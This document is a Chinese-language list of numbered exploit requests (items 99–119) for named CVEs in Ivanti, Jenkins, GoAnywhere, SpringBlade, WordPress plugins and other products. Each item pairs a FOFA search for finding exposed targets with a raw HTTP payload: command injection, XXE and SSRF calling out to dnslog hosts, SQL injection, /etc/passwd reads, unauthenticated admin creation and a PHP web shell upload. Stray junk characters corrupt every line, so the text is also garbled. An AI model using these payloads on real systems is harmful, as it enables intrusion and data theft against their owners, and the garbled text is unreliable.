$ C, d+ e4 I9 z+ b" @. p6 V* V7 ?$ g
' c0 E1 ~! Q' g0 l1 r. ^
+ C: o- _- n3 ]0 Z- L99. Ncast盈可视高清智能录播系统busiFacade RCE/ k% F: D) ?8 i# E0 E
CVE-2024-0305( I. d9 s- c' q" d
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
) U/ ]$ Z$ f, h# S* q3 R! qPOST /classes/common/busiFacade.php HTTP/1.15 ]+ Y: }* e0 s# S' ^' Y* T
Host: 192.168.40.130:8080, ?3 h6 B( ^* V" a/ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- K! `5 e( c& d
Connection: close
5 I; B4 |% E5 [1 R$ FContent-Length: 1548 F2 L6 P8 [6 J' o: v
Accept: */*7 a: w! T5 Y& U0 B+ _1 ?
Accept-Encoding: gzip, deflate
& p |! y8 d. [6 y+ N+ H TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* A+ ~2 [6 ^, s1 G/ F1 L
Content-Type: application/x-www-form-urlencoded; charset=UTF-87 V! F. y( n7 C- Z) r2 `5 v
X-Requested-With: XMLHttpRequest6 m# m5 t! P, l
/ a- a6 K9 K- _& z! [1 T; N
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D9 z. V9 V. V/ ]9 j& Y- j, _7 a
2 q9 n0 y1 Z9 B& `: H
/ |. H( G6 L! q100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传. h* _; I9 T& s3 w- M
CVE-2024-0352
# c R9 F, o7 T5 `; k5 D) l8 G; @FOFA:icon_hash="874152924"* B9 d+ s& _' _. _) h3 T. a! J
POST /api/file/formimage HTTP/1.17 R! O$ M1 E8 L, C7 D$ q
Host: 192.168.40.130
: g( p4 o; @& t2 D1 u+ h4 }User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
, Z1 r. s# c$ x3 P5 ]! N) R* L$ }Connection: close; {3 k* `. h- S! o) D
Content-Length: 201
0 a; P6 W. g$ X- d- @8 Q: aContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei9 }, y. J, A$ S' w* U$ }4 ?
Accept-Encoding: gzip
& e* x# Y6 N; E- s3 s9 J& M; @& J
, }% c; G" D- N------WebKitFormBoundarygcflwtei$ I8 m' u% G& }' W
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
& Q; S* C" J2 E6 C- |. F7 ]Content-Type: application/x-php
0 U1 u( j2 r' E5 ]' d2 f
1 J( D) L! d) ^. d9 c2ayyhRXiAsKXL8olvF5s4qqyI2O2 D% M F( S7 o/ J m. d* `
------WebKitFormBoundarygcflwtei--
: L e9 Q; K2 i* N7 E2 {, ^0 I5 k2 F4 }8 T7 f6 B- X
% S4 \. Q( n- }5 T! y9 a
101. ivanti policy secure-22.6命令注入( G/ `2 Y4 y# A1 `& ~
CVE-2024-21887 c7 M8 B8 X9 W6 y
FOFA:body="welcome.cgi?p=logo"
8 D% |7 a9 Y! k& L+ L6 S2 }! XGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
* M0 E3 j% T* {9 k, u2 y$ |: lHost: x.x.x.xx.x.x.x
9 b8 \+ ^' i0 Z# k& I! b3 Z1 g0 H; r+ XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* p! z* |% ]" x+ ?
Connection: close2 D, S7 ]( [& t( U
Accept-Encoding: gzip
4 o; o' b! R0 ~# f' x
, f3 R) [" U; h# q/ w% K% g3 C1 J) S! Q4 B6 g n# R
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行+ f4 m- [1 a& C6 `+ i3 G* a
CVE-2024-21893. q: _& @! i7 m4 t+ ?
FOFA:body="welcome.cgi?p=logo"8 w/ A4 D6 N' U; U, r5 T
POST /dana-ws/saml20.ws HTTP/1.1 g/ s0 O- V! P& r& G/ ?+ G( u
Host: x.x.x.x
. X; Y2 v* A/ H( N: s8 y D" V1 \# kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 Q6 [3 r1 O; w. z$ F+ K, a- L
Connection: close) v6 Q/ m) }5 ~
Content-Length: 792* j; _2 b& l5 J3 B
Accept-Encoding: gzip
, u% g% b8 ^; L. Y Z+ {+ q* [# B$ h5 J3 u9 Z) O3 d
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
8 P& S9 R4 Z: U- z# |& x
5 }' v' u8 A; x. n3 L103. Ivanti Pulse Connect Secure VPN XXE3 j g2 t" K) Z# x$ |
CVE-2024-220244 V6 D, Y0 D2 B4 x
FOFA:body="welcome.cgi?p=logo"
7 M; E6 p, t- T$ U5 T( Q% ]4 |POST /dana-na/auth/saml-sso.cgi HTTP/1.1* j* K6 P( n8 C
Host: 192.168.40.130:111, ~2 ]1 r% A3 |0 G7 b
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
, Y$ B7 o O& m2 u6 L. @( XConnection: close- N0 p/ W3 t! O" H
Content-Length: 204
8 T; S1 b9 A; y9 l! R* K- H! kContent-Type: application/x-www-form-urlencoded5 H$ I0 e5 ]. l7 |& i
Accept-Encoding: gzip
/ p1 s7 Z' o9 e# ~5 U, M% ~0 j, g8 a) o4 Q) K/ w4 S. G
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==1 R4 Q. N: m9 \# F: g/ M
9 b+ v6 c0 q$ {- S7 S& t) R, A" p; d
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下6 C$ a0 _5 Z' j, m' R' o6 I. u
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>* L- N1 F! o; v; c. I$ X
8 u) G2 X# P# d% b9 \7 H5 \% i0 G% a! X
1 |5 S5 U) _. F# |/ w& M/ M2 U- s104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
: X) k6 O) S: [$ r( Q* zCVE-2024-0569
& U, K" U7 T" X' s3 z2 h. X) mFOFA:title="TOTOLINK": B1 m3 g, L, m; ~8 @
POST /cgi-bin/cstecgi.cgi HTTP/1.1# K6 z( ^, W- h! h
Host:192.168.0.1
$ S7 x8 c% ?* V+ W/ G9 z9 iContent-Length:41) N0 z& a$ V3 `% I( F0 _! |9 o. V
Accept:application/json,text/javascript,*/*;q=0.017 G6 q- I5 C/ G4 i0 _. ^5 {$ f
X-Requested-with: XMLHttpRequest
& ]; e0 W# N) ? i- t% BUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
* \: K I; l7 G% a4 O- gContent-Type: application/x-www-form-urlencoded:charset=UTF-8
; e2 G6 ^& h; Q$ k" I+ GOrigin: http://192.168.0.1
+ k2 B% g9 w! n l; {% t$ f0 o# o$ _Referer: http://192.168.0.1/advance/index.html?time=1671152380564
3 Z; c% r) Q* aAccept-Encoding:gzip,deflate
8 L3 k: ~% [- a/ F- ~- P4 ?+ ~Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7: _+ |2 x5 x6 |+ x; o9 o/ `" E1 A: _
Connection:close
6 g, Q4 @1 S( W: f4 O+ g: l, K
* M3 `5 m; w. o( z% a9 C. m{
! D- Z* R0 m0 I1 ?6 j0 J Z7 Y"topicurl":"getSysStatusCfg",; n7 [, c$ a1 V5 Y5 D
"token":""' b+ \+ @4 s5 y
}
4 T) ]5 ^4 J$ y6 V' { D' h \
; {2 j: I6 y% f' ~' D. G105. SpringBlade v3.2.0 export-user SQL 注入( ?7 ~1 |: u7 g: \ p) o1 d& [
FOFA:body="https://bladex.vip"
, [' w2 [8 i: { J: U2 Uhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
* a0 P: S. h* }3 D( \ y
" w3 K/ N4 A. ]8 t8 i106. SpringBlade dict-biz/list SQL 注入
) O' n) b9 d$ TFOFA:body="Saber 将不能正常工作"
; i: B) w1 M7 uGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1& |/ E/ Q x% [2 p. r
Host: your-ip. Y3 t4 K, w y$ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* H; }' |6 X, ?" w$ N6 X3 ]) a% }! {
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A. D. f; R) G+ Q/ q2 {$ L
Accept-Encoding: gzip, deflate
; Y& l: k8 @4 t! w0 I; FAccept-Language: zh-CN,zh;q=0.92 n- G) r) w; S& F
Connection: close+ H% H8 f4 k v7 M+ m, ^; i
/ x$ T* I* a0 i2 l3 h
1 O+ Z2 L; y7 t1 n4 h+ a' b107. SpringBlade tenant/list SQL 注入
; S& ~6 {* Z/ B% j' m) L) x2 E. m) \FOFA:body="https://bladex.vip"6 O. y F4 m! Q
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1) a) c' y6 D" z2 S
Host: your-ip+ h6 T/ D8 N& x# `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% l; U# y+ Q. _ r6 M1 r: nBlade-Auth:替换为自己的+ G7 q4 x- _7 d0 v- W
Connection: close' X' p8 W) ^1 _
* H$ D% z" c2 T: G
0 S( A0 g* \ q3 A& `, u* n. U108. D-Tale 3.9.0 SSRF
& H( x W5 ~( h( R) G8 g0 h1 bCVE-2024-21642
! F4 n: _3 z" a- c7 KFOFA:"dtale/static/images/favicon.png"
4 W. B2 I( ?9 H. g" u( YGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
, F9 Z( H, o3 i: S( t( h: zHost: your-ip
4 @; w+ ~* ~; ^7 l! S3 W# TAccept: application/json, text/plain, */*: M# T, P5 R9 L3 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, ?- ~8 R1 t, S k. `3 R8 M' WAccept-Encoding: gzip, deflate9 a7 D! i5 H/ b/ J6 B# k% x
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
f* T0 `: W' F8 T. TConnection: close9 m3 w9 O! @/ X* R; [2 v
; T" z, x: ~8 L9 y# I/ o1 X
: U/ V7 M2 j( M2 N109. Jenkins CLI 任意文件读取% e. h) t8 u3 h
CVE-2024-238979 B2 O: {0 X1 ~1 M& y
FOFA:header="X-Jenkins"
& V- \: \7 E+ Y+ t: U4 G" TPOST /cli?remoting=false HTTP/1.1& z5 K6 {$ b: h5 e. r, r3 ^
Host:: i$ E3 k0 y. Z o) \
Content-type: application/octet-stream
* T6 Q) ^6 s; ~2 _% M) ESession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92$ Z7 r* S7 M3 Y* p$ X
Side: upload: D: `) `( M# D1 ]
Connection: keep-alive4 K$ L7 q. e3 B
Content-Length: 163
, L+ P% m9 Q8 b @0 R
7 Q! t7 E1 H. D( ub'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03', B; G U: j' e+ @+ Z
$ d# E# g6 n) V2 C7 H. F, Q
: L- N: f+ v2 ]POST /cli?remoting=false HTTP/1.1
/ a. j" R( x- C% v; {+ `Host:
$ C6 g, v; z! ~* ySession: 39382176-ac9c-4a00-bbc6-4172b3cf1e925 D& S1 c3 B7 x+ [- O# ?
download
: h# L; L! f4 M: z+ wContent-Type: application/x-www-form-urlencoded
4 k+ ^4 P4 B" j# I" N1 j8 KContent-Length: 0; G3 z& K4 ^) K* n
6 Q6 N: @& R) w( w0 f3 h. i& b0 p$ o9 H) R" T, @
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin) g/ l% k! Y. k2 V5 P' y- w
java -jar jenkins-cli.jar help
0 |/ Y& K# J0 P( @2 H[COMMAND]
2 J+ c$ l" S" }/ JLists all the available commands or a detailed description of single command.
& X/ V/ s6 o' m3 V COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
' G5 Q5 y" x( v0 u
+ X5 W: D# w o0 Z6 L7 q# T* t2 N! P5 k; `# v
110. Goanywhere MFT 未授权创建管理员
% R. O- U% Z i4 F' X4 d3 yCVE-2024-0204; i& o- z/ ~0 D/ I- m
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
; u# Q* |+ u/ O' i! v8 `+ ]" HGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
0 A- ^) X. j' m7 V6 P& I7 `* @Host: 192.168.40.130:8000+ I! Z- e+ y$ G
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
5 |% z2 k) V2 b3 f: P! W) zConnection: close$ h& ?. Z, D& l4 r! w$ g
Accept: */*
' c6 P% x- m7 E, fAccept-Language: en ]! g; D# `1 i7 d3 l
Accept-Encoding: gzip
! m1 s/ A3 D9 ~: R: B( o/ Z
# @8 E& L, r" w) _/ u
V2 k5 L4 A, }6 X111. WordPress Plugin HTML5 Video Player SQL注入+ U3 H! ^9 j, Y! e" m
CVE-2024-10618 l4 c* g# o3 V3 l( B
FOFA:"wordpress" && body="html5-video-player"$ H& a% E: {( d* H
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
5 F: ~6 }, Y! h1 c( |2 E+ M2 ^Host: 192.168.40.130:1129 c: g1 ~3 U% n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
. L: y7 y: v; z/ RConnection: close' h4 k+ G# A0 n! a' X
Accept: */*4 d7 ^* E3 q' G8 V
Accept-Language: en
: l' Y* g+ A, y! A; ?6 G7 aAccept-Encoding: gzip/ r) ]% J# O4 B5 v+ x) i" w
9 q" \( t7 \5 p
( M+ S8 S1 S1 H9 K- H2 \112. WordPress Plugin NotificationX SQL 注入0 s/ v' R8 D* f9 A8 B! O
CVE-2024-1698
3 d# g1 w/ Y8 w# X3 IFOFA:body="/wp-content/plugins/notificationx"
1 ? Z$ i" @# Y' s* \# `+ R; pPOST /wp-json/notificationx/v1/analytics HTTP/1.1) [) q; [- R6 u) I0 o! [8 H! M
Host: {{Hostname}}; A, I0 _, E1 r& ~. h, q# S9 t
Content-Type: application/json" K$ w/ B( z3 t3 x, ]
' V' R# z# s: b; R) y" q{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}: m0 F z# m N9 @3 F% D9 j
3 h# N7 e7 z1 k
; [. ~7 _1 D1 a8 m8 @
113. WordPress Automatic 插件任意文件下载和SSRF. Z1 x7 C- _, R" I
CVE-2024-27954
6 X$ U7 X; i+ D$ hFOFA:"/wp-content/plugins/wp-automatic"
9 _6 T" T" G7 `% K Q8 HGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.16 E2 I: e! g8 G1 Q
Host: x.x.x.x" F# }- Q; D9 e& o
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36/ `7 R8 Z! [( y( o8 B+ p
Connection: close
* y" l" ]7 o: g# s* W8 D! bAccept: */*
3 a, T. E# V, g* Q+ f% WAccept-Language: en
' L5 s3 N4 F) _9 }0 ]2 SAccept-Encoding: gzip
- F* P b1 K9 e' X4 @; W1 ]( V
4 r8 Z7 B- t4 }) r2 Y: G
) G; ~% G' _ b* R% ~114. WordPress MasterStudy LMS插件 SQL注入2 ], G$ A7 L1 @2 b1 D) O
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"6 T' B% l U2 o8 p% y
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.13 A5 m/ X: ~4 n% F# y! g5 F
Host: your-ip, E* G- z# R( g1 h4 N
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 Q& U) Z5 x& x7 u& A) m3 l
Accept-Charset: utf-8$ \' p6 E, i, k& N( B; f. G
Accept-Encoding: gzip, deflate
! }9 y6 p6 b% w7 R4 q$ bConnection: close
( v% L ]: ?; V9 V: C3 z0 l6 I, e# J0 j0 g* j S4 R
2 s. U! L% \* T' q, h, D4 k1 o115. WordPress Bricks Builder <= 1.9.6 RCE
3 S v7 x: o. n) d& dCVE-2024-256000 v9 v3 e, z9 f: O0 x. D
FOFA: body="/wp-content/themes/bricks/" Z, ^: A' Z% g3 G% j. ^
第一步,获取网站的nonce值" r* @/ f% v) E5 k
GET / HTTP/1.1
7 F+ I/ a8 x# a4 m \7 t7 cHost: x.x.x.x! h1 L/ T4 q% e# U4 _- S# _
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
+ h8 t- ^' z8 p" P, {. A3 R8 z/ x( pConnection: close
8 V1 z% |" Y! CAccept-Encoding: gzip
+ m% o5 p$ y! W6 w m; ]
- r+ {' S4 [" ^0 H& n" }
8 f( ^( D) P$ k, ?+ h+ w, R: \第二步替换nonce值,执行命令% w) {2 q) K1 P- T5 |/ Y0 x
POST /wp-json/bricks/v1/render_element HTTP/1.1
" B5 ~# T" Q& `) p- ^Host: x.x.x.x5 S0 d% L' y9 w& X+ F5 V. v$ r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) O8 H$ [3 G: y3 u% U9 L% E5 mConnection: close7 N% u& w- }3 _1 O
Content-Length: 356) t) e6 t/ |8 y9 |+ v0 w! U
Content-Type: application/json) f- ]! m0 ^+ l5 w; w0 B2 S3 _ J" t
Accept-Encoding: gzip- Z4 d; _! b# p' C
9 J- f& m0 e [2 L2 ?9 b( _{' l; X" J' n D ^& O
"postId": "1",
[: ~' u# Y0 ~/ C6 w5 } "nonce": "第一步获得的值",8 B7 M& K- W; k. m/ G2 P- N ]
"element": {3 V! g2 A, ?7 ^' i
"name": "container",
" K9 G' u1 |9 T* j" K' n, B "settings": {0 u* O- G1 P/ d: O7 ^ y
"hasLoop": "true",( O# Q( n! b+ s4 g/ g. m: G
"query": {
: T+ h8 i2 s2 O% ^ "useQueryEditor": true,2 R- l, E0 V8 H7 \8 R/ X
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
2 Z+ `4 o% V! ]. E "objectType": "post"
- P* E2 r H, u' l0 j" W5 H }
! H. [% w. p! L2 p1 V }. r- p. U1 u j0 s9 E7 c
}
; ?# e( T" }. s4 }( @+ {6 D/ X}) `9 O/ w" b" W4 F& h
/ O1 \5 @3 E+ |5 B* C, _" k* {2 @8 H4 Z% `+ s }5 s( m
116. wordpress js-support-ticket文件上传/ P! B4 t* f4 a" c7 u/ K
FOFA:body="wp-content/plugins/js-support-ticket"( W' e4 d$ }* j3 W0 H, w
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
. ?+ Y8 M6 m: e8 AHost:3 o z* S9 H/ P2 g- N
Content-Type: multipart/form-data; boundary=--------767099171' v- z: D) G1 b3 b' Q/ a6 n# Q
User-Agent: Mozilla/5.0
$ ` O) R7 V" R7 z, O/ x C+ e4 o
----------767099171
N: k4 F9 m8 {% A4 tContent-Disposition: form-data; name="action"5 f& N2 H* D+ U: L; [* Q- _, _4 @3 k
configuration_saveconfiguration
5 Y j: c; j- O2 `----------767099171' L2 L( j% f# F& e4 r n$ G( R
Content-Disposition: form-data; name="form_request"1 Q5 ^* |5 T- }) [( i" A6 O
jssupportticket
( R" B! F% ]1 m- t: s7 i. j----------7670991712 ?* \6 C2 N, d, h+ @2 U
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
+ E( [' ?* b5 w! M2 V) JContent-Type: image/png
6 w" D5 C, \9 n D, z! K6 {( z----------767099171--$ {: h# e4 t0 V1 w z. k. K
$ y) B( c# S5 G" U2 |* R) e
8 Q( s: X7 _% }" v* c8 c$ K$ r6 j
117. WordPress LayerSlider插件SQL注入
3 n& |5 c2 P c- s, eversion:7.9.11 – 7.10.0
& Q x% l, h: F# |FOFA:body="/wp-content/plugins/LayerSlider/"$ [. U4 ]( ^& g
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
% N9 e: p8 x; \; T0 gHost: your-ip
5 Z' Z: ^: G7 u* |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! T3 m. ^2 U5 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, |1 c3 w+ k: X$ o- I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 v9 c5 z F, P! w
Accept-Encoding: gzip, deflate, br
4 |6 {6 R- X+ X, X( N4 ]% m: t* ~Connection: close
2 N1 Y$ N3 I# OUpgrade-Insecure-Requests: 1# [0 q6 [4 R( N" d) g2 y% ]- w
! f7 z8 \6 A. U1 Q/ u [
" d% w7 m5 @9 c) U% F5 w118. 北京百绰智能S210管理平台uploadfile.php任意文件上传- s( m9 ]8 p; N5 e4 W5 K
CVE-2024-0939
' A+ x: p/ A& F+ E& n' t5 FFOFA:title="Smart管理平台"/ L. {) g8 i9 ?+ h6 I9 m
POST /Tool/uploadfile.php? HTTP/1.1/ \. w, c% s5 O, X( b8 p/ J- r
Host: 192.168.40.130:8443
/ c6 N8 }+ |2 Z+ R3 F1 ?Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
6 l: _" j$ L w8 h7 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
; t9 ?/ n9 J( D% m; XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* N ~& L% P z! I i8 E1 G6 W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' ^4 N# u; i" p+ ^' m, u6 D% zAccept-Encoding: gzip, deflate
' y' {) W" [1 j/ c. F; H) _Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887. W% z3 B/ Z' F& H* H9 _
Content-Length: 4056 B) R$ T8 \- W' p& i! @" Y
Origin: https://192.168.40.130:8443
) G$ l/ ~8 G+ r. o* J: s3 iReferer: https://192.168.40.130:8443/Tool/uploadfile.php2 L$ Z! ~) L3 s/ s! k
Upgrade-Insecure-Requests: 1
7 `" Q, d* T! | l2 pSec-Fetch-Dest: document
- [7 b% i B! Z1 {9 ]( x% RSec-Fetch-Mode: navigate
4 E4 ]7 u# v. t& U/ T# sSec-Fetch-Site: same-origin
1 _* u4 t0 s$ H& K8 a; tSec-Fetch-User: ?1
: S) ?8 g$ Q0 n" R. w" CTe: trailers
. n: p/ I' ^# O/ D. [Connection: close
5 ~. o& c" U' h( i" [6 O
- \ F, g% v9 U) C! M- d-----------------------------13979701222747646634037182887' l! _' O' i$ z5 b$ j% f! C$ v
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
9 m* J3 u9 h4 T4 g9 ?7 @Content-Type: application/octet-stream/ E) ?% l0 ]1 H/ \0 q
- M+ u5 }5 L, B6 b8 [* l& K
<?php+ g' F! _6 s/ s% v0 z9 l
system($_POST["passwd"]);$ F M7 m4 ~ o3 i5 L5 [
?>- M+ M* y/ F3 g+ i( H3 j
-----------------------------13979701222747646634037182887
y+ C/ O) p+ `% {5 t1 {Content-Disposition: form-data; name="txt_path"
# L; i6 F" S- S+ m" n& t! ]' F' t& b5 C
/home/src.php/ }$ Y6 d" i. B0 o
-----------------------------13979701222747646634037182887--
' K) U) L2 B- k& E4 ^
: Z3 ]8 S4 [; s9 i. l$ w
5 a8 n* i: a1 p l) u' C访问/home/src.php
7 r1 W+ q: ~" j* Y4 @ `* H6 M6 c& k3 W( t+ l. w/ }" K
119. 北京百绰智能S20后台sysmanageajax.php sql注入: j& J% k8 | s# O6 y a
CVE-2024-1254
U3 V( m% T: v U4 F2 QFOFA:title="Smart管理平台"
9 T7 V( M! F6 B6 y+ r9 c0 F. P3 J先登录进入系统,默认账号密码为admin/admin
' [+ q+ X" {6 X0 X/ XPOST /sysmanage/sysmanageajax.php HTTP/1.11' w; O- L& u3 C6 X S* Q7 B& Y# K
Host: x.x.x.x
$ G% R$ V5 I9 Z$ HCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
* P6 X3 @4 O' _$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
! w5 C$ E0 m& p* w8 mAccept: */*
" j5 A* Y, b# S; s; ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ V! Q q* C2 R& j! e' y
Accept-Encoding: gzip, deflate
+ ]$ ]" b& \4 wContent-Type: application/x-www-form-urlencoded;! {3 V4 [/ {5 U7 I! B. M
Content-Length: 109- G/ q, b) p9 m- |, p' N3 K
Origin: https://58.18.133.60:8443
2 G, W1 z* d, K/ h) fReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php' u2 x4 ]* S$ x C1 v
Sec-Fetch-Dest: empty F# V7 d: W- v2 k. a
Sec-Fetch-Mode: cors
2 p* c- b5 u% k# ASec-Fetch-Site: same-origin
0 z3 |- I+ M* T1 S3 g( fX-Forwarded-For: 1.1.1.1, j- f* d8 E4 J% w
X-Originating-Ip: 1.1.1.1
# y. ~) D6 F- f& J9 k) b3 U' G! EX-Remote-Ip: 1.1.1.1% w+ y N6 x2 ?) F4 N2 _
X-Remote-Addr: 1.1.1.1* r. O9 u' O5 p; G3 \- R( r3 S
Te: trailers" s! w* ` w: h ~% i
Connection: close
6 Z$ N& G% {/ H5 x. G8 Z
! W; x* D6 {& ^ ssrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
2 w! v' G7 n% _# o( K
$ z0 W* r# s; F) m
